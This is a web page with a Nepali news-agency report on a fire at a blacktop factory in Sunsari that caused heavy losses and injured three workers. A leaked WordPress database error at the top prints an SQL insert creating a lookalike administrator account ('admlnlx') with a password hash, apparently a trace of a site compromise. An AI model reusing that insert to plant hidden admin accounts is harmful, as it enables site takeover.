WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BPEonYo9pGquA1hfw0wJfsIIu0AJCi/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-28 23:27:40', '', 'admlnlx', 'admlnlx')
इटहरी, मङ्सिर २२ –
सुनसरी जिल्लाको दुहवीभलुवा नगरपालिका– ४ स्थित कालोडल्लप उत्पादन उद्योगमा हिजो साँझ आगलागी हुँदा रु बीस करोड बराबरको धनमाल नोक्सान भएको उद्योग सञ्चालक मनिष अग्रवालले बताउनुभएको छ ।
खाना पकाउने एलपी ग्यास चुहावट भई उद्योगमा आगलागी भएको थियो । आगो फैलनासाथ उद्योगमा भएका ग्यास सिलिन्डर पड्किन थालेपछि उद्योगभित्र आगो फैलिएको थियो ।
आगो फैलिएपछि त्यहाँ कार्यरत मजदुरमा भागदौड मच्चिँदा तीन कामदार घाइते भएका थिए । उद्योगमा करिव दुई हजार मजदुर कार्यरत थिए ।
घाइते मजदुर अमृत श्रेष्ठ दिलीप चौधरी र राजु यादवलाई राति नै उपचारका लागि विपी कोइराला स्वास्थ्य विज्ञान प्रतिष्ठानमा भर्ना गरिएको स्थानीय इलाका प्रहरी कार्यालयका प्रहरी निरीक्षक शिव पोख्रेलले जानकारी दिनुभयो ।
आगलागीका कारण उद्योगकोे कच्चा पदार्थ उपकरणसमेत जलेर पूरै नोक्सानी भएको सञ्चालक अग्रवालले बताउनुभयो ।
इटहरी, धरान, विराटनगर, दमक र राजविराजबाट आएका बारुणयन्त्रले राति २ बजे मात्र आगो नियन्त्रण मा लिन सफल भएको प्रहरीले जनाएको छ । – रासस